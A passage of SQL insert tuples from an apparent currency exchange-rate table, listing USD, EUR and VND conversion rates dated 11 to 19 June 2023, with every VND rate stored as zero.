(5237, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-06-11'),
(5238, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-06-11'),
(5239, 1, 'USD', 1.000000, 2, 'EUR', 0.927640, '2023-06-12'),
(5240, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-06-12'),
(5241, 2, 'EUR', 1.000000, 1, 'USD', 1.078000, '2023-06-12'),
(5242, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-06-12'),
(5243, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-06-12'),
(5244, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-06-12'),
(5245, 1, 'USD', 0.000000, 2, 'EUR', 0.927640, '2023-06-12'),
(5246, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-06-12'),
(5247, 2, 'EUR', 0.000000, 1, 'USD', 1.078000, '2023-06-12'),
(5248, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-06-12'),
(5249, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-06-12'),
(5250, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-06-12'),
(5251, 1, 'USD', 1.000000, 2, 'EUR', 0.927640, '2023-06-12'),
(5252, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-06-12'),
(5253, 2, 'EUR', 1.000000, 1, 'USD', 1.078000, '2023-06-12'),
(5254, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-06-12'),
(5255, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-06-12'),
(5256, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-06-12'),
(5257, 1, 'USD', 0.000000, 2, 'EUR', 0.927640, '2023-06-12'),
(5258, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-06-12'),
(5259, 2, 'EUR', 0.000000, 1, 'USD', 1.078000, '2023-06-12'),
(5260, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-06-12'),
(5261, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-06-12'),
(5262, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-06-12'),
(5263, 1, 'USD', 1.000000, 2, 'EUR', 0.927640, '2023-06-12'),
(5264, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-06-12'),
(5265, 2, 'EUR', 1.000000, 1, 'USD', 1.078000, '2023-06-12'),
(5266, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-06-12'),
(5267, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-06-12'),
(5268, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-06-12'),
(5269, 1, 'USD', 0.000000, 2, 'EUR', 0.927640, '2023-06-12'),
(5270, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-06-12'),
(5271, 2, 'EUR', 0.000000, 1, 'USD', 1.078000, '2023-06-12'),
(5272, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-06-12'),
(5273, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-06-12'),
(5274, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-06-12'),
(5275, 1, 'USD', 1.000000, 2, 'EUR', 0.927640, '2023-06-12'),
(5276, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-06-12'),
(5277, 2, 'EUR', 1.000000, 1, 'USD', 1.078000, '2023-06-12'),
(5278, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-06-12'),
(5279, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-06-12'),
(5280, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-06-12'),
(5281, 1, 'USD', 0.000000, 2, 'EUR', 0.927640, '2023-06-12'),
(5282, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-06-12'),
(5283, 2, 'EUR', 0.000000, 1, 'USD', 1.078000, '2023-06-12'),
(5284, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-06-12'),
(5285, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-06-12'),
(5286, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-06-12'),
(5287, 1, 'USD', 1.000000, 2, 'EUR', 0.927640, '2023-06-13'),
(5288, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-06-13'),
(5289, 2, 'EUR', 1.000000, 1, 'USD', 1.078000, '2023-06-13'),
(5290, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-06-13'),
(5291, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-06-13'),
(5292, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-06-13'),
(5293, 1, 'USD', 0.000000, 2, 'EUR', 0.928940, '2023-06-13'),
(5294, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-06-13'),
(5295, 2, 'EUR', 0.000000, 1, 'USD', 1.076500, '2023-06-13'),
(5296, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-06-13'),
(5297, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-06-13'),
(5298, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-06-13'),
(5299, 1, 'USD', 1.000000, 2, 'EUR', 0.928940, '2023-06-13'),
(5300, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-06-13'),
(5301, 2, 'EUR', 1.000000, 1, 'USD', 1.076500, '2023-06-13'),
(5302, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-06-13'),
(5303, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-06-13'),
(5304, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-06-13'),
(5305, 1, 'USD', 0.000000, 2, 'EUR', 0.928940, '2023-06-13'),
(5306, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-06-13'),
(5307, 2, 'EUR', 0.000000, 1, 'USD', 1.076500, '2023-06-13'),
(5308, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-06-13'),
(5309, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-06-13'),
(5310, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-06-13'),
(5311, 1, 'USD', 1.000000, 2, 'EUR', 0.928940, '2023-06-13'),
(5312, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-06-13'),
(5313, 2, 'EUR', 1.000000, 1, 'USD', 1.076500, '2023-06-13'),
(5314, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-06-13'),
(5315, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-06-13'),
(5316, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-06-13'),
(5317, 1, 'USD', 0.000000, 2, 'EUR', 0.928940, '2023-06-13'),
(5318, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-06-13'),
(5319, 2, 'EUR', 0.000000, 1, 'USD', 1.076500, '2023-06-13'),
(5320, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-06-13'),
(5321, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-06-13'),
(5322, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-06-13'),
(5323, 1, 'USD', 1.000000, 2, 'EUR', 0.928940, '2023-06-13'),
(5324, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-06-13'),
(5325, 2, 'EUR', 1.000000, 1, 'USD', 1.076500, '2023-06-13'),
(5326, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-06-13'),
(5327, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-06-13'),
(5328, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-06-13'),
(5329, 1, 'USD', 0.000000, 2, 'EUR', 0.928940, '2023-06-13'),
(5330, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-06-13'),
(5331, 2, 'EUR', 0.000000, 1, 'USD', 1.076500, '2023-06-13'),
(5332, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-06-13'),
(5333, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-06-13'),
(5334, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-06-13'),
(5335, 1, 'USD', 1.000000, 2, 'EUR', 0.928940, '2023-06-14'),
(5336, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-06-14'),
(5337, 2, 'EUR', 1.000000, 1, 'USD', 1.076500, '2023-06-14'),
(5338, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-06-14'),
(5339, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-06-14'),
(5340, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-06-14'),
(5341, 1, 'USD', 0.000000, 2, 'EUR', 0.926530, '2023-06-14'),
(5342, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-06-14'),
(5343, 2, 'EUR', 0.000000, 1, 'USD', 1.079300, '2023-06-14'),
(5344, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-06-14'),
(5345, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-06-14'),
(5346, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-06-14'),
(5347, 1, 'USD', 1.000000, 2, 'EUR', 0.926530, '2023-06-14'),
(5348, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-06-14'),
(5349, 2, 'EUR', 1.000000, 1, 'USD', 1.079300, '2023-06-14'),
(5350, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-06-14'),
(5351, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-06-14'),
(5352, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-06-14'),
(5353, 1, 'USD', 0.000000, 2, 'EUR', 0.926530, '2023-06-14'),
(5354, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-06-14'),
(5355, 2, 'EUR', 0.000000, 1, 'USD', 1.079300, '2023-06-14'),
(5356, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-06-14'),
(5357, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-06-14'),
(5358, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-06-14'),
(5359, 1, 'USD', 1.000000, 2, 'EUR', 0.926530, '2023-06-14'),
(5360, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-06-14'),
(5361, 2, 'EUR', 1.000000, 1, 'USD', 1.079300, '2023-06-14'),
(5362, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-06-14'),
(5363, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-06-14'),
(5364, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-06-14'),
(5365, 1, 'USD', 0.000000, 2, 'EUR', 0.926530, '2023-06-14'),
(5366, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-06-14'),
(5367, 2, 'EUR', 0.000000, 1, 'USD', 1.079300, '2023-06-14'),
(5368, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-06-14'),
(5369, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-06-14'),
(5370, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-06-14'),
(5371, 1, 'USD', 1.000000, 2, 'EUR', 0.926530, '2023-06-14'),
(5372, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-06-14'),
(5373, 2, 'EUR', 1.000000, 1, 'USD', 1.079300, '2023-06-14'),
(5374, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-06-14'),
(5375, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-06-14'),
(5376, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-06-14'),
(5377, 1, 'USD', 0.000000, 2, 'EUR', 0.926530, '2023-06-14'),
(5378, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-06-14'),
(5379, 2, 'EUR', 0.000000, 1, 'USD', 1.079300, '2023-06-14'),
(5380, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-06-14'),
(5381, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-06-14'),
(5382, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-06-14'),
(5383, 1, 'USD', 1.000000, 2, 'EUR', 0.926530, '2023-06-15'),
(5384, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-06-15'),
(5385, 2, 'EUR', 1.000000, 1, 'USD', 1.079300, '2023-06-15'),
(5386, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-06-15'),
(5387, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-06-15'),
(5388, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-06-15'),
(5389, 1, 'USD', 0.000000, 2, 'EUR', 0.925150, '2023-06-15'),
(5390, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-06-15'),
(5391, 2, 'EUR', 0.000000, 1, 'USD', 1.080900, '2023-06-15'),
(5392, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-06-15'),
(5393, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-06-15'),
(5394, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-06-15'),
(5395, 1, 'USD', 1.000000, 2, 'EUR', 0.925150, '2023-06-15'),
(5396, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-06-15'),
(5397, 2, 'EUR', 1.000000, 1, 'USD', 1.080900, '2023-06-15'),
(5398, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-06-15'),
(5399, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-06-15'),
(5400, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-06-15'),
(5401, 1, 'USD', 0.000000, 2, 'EUR', 0.925150, '2023-06-15'),
(5402, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-06-15'),
(5403, 2, 'EUR', 0.000000, 1, 'USD', 1.080900, '2023-06-15'),
(5404, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-06-15'),
(5405, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-06-15'),
(5406, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-06-15'),
(5407, 1, 'USD', 1.000000, 2, 'EUR', 0.925150, '2023-06-15'),
(5408, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-06-15'),
(5409, 2, 'EUR', 1.000000, 1, 'USD', 1.080900, '2023-06-15'),
(5410, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-06-15'),
(5411, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-06-15'),
(5412, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-06-15'),
(5413, 1, 'USD', 0.000000, 2, 'EUR', 0.925150, '2023-06-15'),
(5414, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-06-15'),
(5415, 2, 'EUR', 0.000000, 1, 'USD', 1.080900, '2023-06-15'),
(5416, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-06-15'),
(5417, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-06-15'),
(5418, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-06-15'),
(5419, 1, 'USD', 1.000000, 2, 'EUR', 0.925150, '2023-06-15'),
(5420, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-06-15'),
(5421, 2, 'EUR', 1.000000, 1, 'USD', 1.080900, '2023-06-15'),
(5422, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-06-15'),
(5423, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-06-15'),
(5424, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-06-15'),
(5425, 1, 'USD', 0.000000, 2, 'EUR', 0.925150, '2023-06-15'),
(5426, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-06-15'),
(5427, 2, 'EUR', 0.000000, 1, 'USD', 1.080900, '2023-06-15'),
(5428, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-06-15'),
(5429, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-06-15'),
(5430, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-06-15'),
(5431, 1, 'USD', 1.000000, 2, 'EUR', 0.925150, '2023-06-16'),
(5432, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-06-16'),
(5433, 2, 'EUR', 1.000000, 1, 'USD', 1.080900, '2023-06-16'),
(5434, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-06-16'),
(5435, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-06-16'),
(5436, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-06-16'),
(5437, 1, 'USD', 0.000000, 2, 'EUR', 0.924300, '2023-06-16'),
(5438, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-06-16'),
(5439, 2, 'EUR', 0.000000, 1, 'USD', 1.081900, '2023-06-16'),
(5440, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-06-16'),
(5441, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-06-16'),
(5442, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-06-16'),
(5443, 1, 'USD', 1.000000, 2, 'EUR', 0.924300, '2023-06-16'),
(5444, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-06-16'),
(5445, 2, 'EUR', 1.000000, 1, 'USD', 1.081900, '2023-06-16'),
(5446, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-06-16'),
(5447, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-06-16'),
(5448, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-06-16'),
(5449, 1, 'USD', 0.000000, 2, 'EUR', 0.924300, '2023-06-16'),
(5450, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-06-16'),
(5451, 2, 'EUR', 0.000000, 1, 'USD', 1.081900, '2023-06-16'),
(5452, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-06-16'),
(5453, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-06-16'),
(5454, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-06-16'),
(5455, 1, 'USD', 1.000000, 2, 'EUR', 0.924300, '2023-06-16'),
(5456, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-06-16'),
(5457, 2, 'EUR', 1.000000, 1, 'USD', 1.081900, '2023-06-16'),
(5458, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-06-16'),
(5459, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-06-16'),
(5460, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-06-16'),
(5461, 1, 'USD', 0.000000, 2, 'EUR', 0.924300, '2023-06-16'),
(5462, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-06-16'),
(5463, 2, 'EUR', 0.000000, 1, 'USD', 1.081900, '2023-06-16'),
(5464, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-06-16'),
(5465, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-06-16'),
(5466, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-06-16'),
(5467, 1, 'USD', 1.000000, 2, 'EUR', 0.924300, '2023-06-16'),
(5468, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-06-16'),
(5469, 2, 'EUR', 1.000000, 1, 'USD', 1.081900, '2023-06-16'),
(5470, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-06-16'),
(5471, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-06-16'),
(5472, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-06-16'),
(5473, 1, 'USD', 0.000000, 2, 'EUR', 0.924300, '2023-06-16'),
(5474, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-06-16'),
(5475, 2, 'EUR', 0.000000, 1, 'USD', 1.081900, '2023-06-16'),
(5476, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-06-16'),
(5477, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-06-16'),
(5478, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-06-16'),
(5479, 1, 'USD', 1.000000, 2, 'EUR', 0.924300, '2023-06-17'),
(5480, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-06-17'),
(5481, 2, 'EUR', 1.000000, 1, 'USD', 1.081900, '2023-06-17'),
(5482, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-06-17'),
(5483, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-06-17'),
(5484, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-06-17'),
(5485, 1, 'USD', 0.000000, 2, 'EUR', 0.911910, '2023-06-17'),
(5486, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-06-17'),
(5487, 2, 'EUR', 0.000000, 1, 'USD', 1.096600, '2023-06-17'),
(5488, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-06-17'),
(5489, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-06-17'),
(5490, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-06-17'),
(5491, 1, 'USD', 1.000000, 2, 'EUR', 0.911910, '2023-06-17'),
(5492, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-06-17'),
(5493, 2, 'EUR', 1.000000, 1, 'USD', 1.096600, '2023-06-17'),
(5494, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-06-17'),
(5495, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-06-17'),
(5496, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-06-17'),
(5497, 1, 'USD', 0.000000, 2, 'EUR', 0.911910, '2023-06-17'),
(5498, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-06-17'),
(5499, 2, 'EUR', 0.000000, 1, 'USD', 1.096600, '2023-06-17'),
(5500, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-06-17'),
(5501, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-06-17'),
(5502, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-06-17'),
(5503, 1, 'USD', 1.000000, 2, 'EUR', 0.911910, '2023-06-17'),
(5504, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-06-17'),
(5505, 2, 'EUR', 1.000000, 1, 'USD', 1.096600, '2023-06-17'),
(5506, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-06-17'),
(5507, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-06-17'),
(5508, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-06-17'),
(5509, 1, 'USD', 0.000000, 2, 'EUR', 0.911910, '2023-06-17'),
(5510, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-06-17'),
(5511, 2, 'EUR', 0.000000, 1, 'USD', 1.096600, '2023-06-17'),
(5512, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-06-17'),
(5513, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-06-17'),
(5514, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-06-17'),
(5515, 1, 'USD', 1.000000, 2, 'EUR', 0.911910, '2023-06-17'),
(5516, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-06-17'),
(5517, 2, 'EUR', 1.000000, 1, 'USD', 1.096600, '2023-06-17'),
(5518, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-06-17'),
(5519, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-06-17'),
(5520, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-06-17'),
(5521, 1, 'USD', 0.000000, 2, 'EUR', 0.911910, '2023-06-17'),
(5522, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-06-17'),
(5523, 2, 'EUR', 0.000000, 1, 'USD', 1.096600, '2023-06-17'),
(5524, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-06-17'),
(5525, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-06-17'),
(5526, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-06-17'),
(5527, 1, 'USD', 1.000000, 2, 'EUR', 0.911910, '2023-06-18'),
(5528, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-06-18'),
(5529, 2, 'EUR', 1.000000, 1, 'USD', 1.096600, '2023-06-18'),
(5530, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-06-18'),
(5531, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-06-18'),
(5532, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-06-18'),
(5533, 1, 'USD', 0.000000, 2, 'EUR', 0.911910, '2023-06-18'),
(5534, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-06-18'),
(5535, 2, 'EUR', 0.000000, 1, 'USD', 1.096600, '2023-06-18'),
(5536, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-06-18'),
(5537, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-06-18'),
(5538, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-06-18'),
(5539, 1, 'USD', 1.000000, 2, 'EUR', 0.911910, '2023-06-18'),
(5540, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-06-18'),
(5541, 2, 'EUR', 1.000000, 1, 'USD', 1.096600, '2023-06-18'),
(5542, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-06-18'),
(5543, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-06-18'),
(5544, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-06-18'),
(5545, 1, 'USD', 0.000000, 2, 'EUR', 0.911910, '2023-06-18'),
(5546, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-06-18'),
(5547, 2, 'EUR', 0.000000, 1, 'USD', 1.096600, '2023-06-18'),
(5548, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-06-18'),
(5549, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-06-18'),
(5550, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-06-18'),
(5551, 1, 'USD', 1.000000, 2, 'EUR', 0.911910, '2023-06-18'),
(5552, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-06-18'),
(5553, 2, 'EUR', 1.000000, 1, 'USD', 1.096600, '2023-06-18'),
(5554, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-06-18'),
(5555, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-06-18'),
(5556, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-06-18'),
(5557, 1, 'USD', 0.000000, 2, 'EUR', 0.911910, '2023-06-18'),
(5558, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-06-18'),
(5559, 2, 'EUR', 0.000000, 1, 'USD', 1.096600, '2023-06-18'),
(5560, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-06-18'),
(5561, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-06-18'),
(5562, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-06-18'),
(5563, 1, 'USD', 1.000000, 2, 'EUR', 0.911910, '2023-06-18'),
(5564, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-06-18'),
(5565, 2, 'EUR', 1.000000, 1, 'USD', 1.096600, '2023-06-18'),
(5566, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-06-18'),
(5567, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-06-18'),
(5568, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-06-18'),
(5569, 1, 'USD', 0.000000, 2, 'EUR', 0.911910, '2023-06-18'),
(5570, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-06-18'),
(5571, 2, 'EUR', 0.000000, 1, 'USD', 1.096600, '2023-06-18'),
(5572, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-06-18'),
(5573, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-06-18'),
(5574, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-06-18'),
(5575, 1, 'USD', 1.000000, 2, 'EUR', 0.911910, '2023-06-19'),
(5576, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-06-19'),
(5577, 2, 'EUR', 1.000000, 1, 'USD', 1.096600, '2023-06-19'),
(5578, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-06-19'),
(5579, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-06-19'),
(5580, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-06-19'),
(5581, 1, 'USD', 0.000000, 2, 'EUR', 0.911910, '2023-06-19'),
(5582, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-06-19'),
(5583, 2, 'EUR', 0.000000, 1, 'USD', 1.096600, '2023-06-19'),
(5584, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-06-19'),
(5585, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-06-19'),
(5586, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-06-19'),
(5587, 1, 'USD', 1.000000, 2, 'EUR', 0.911910, '2023-06-19'),
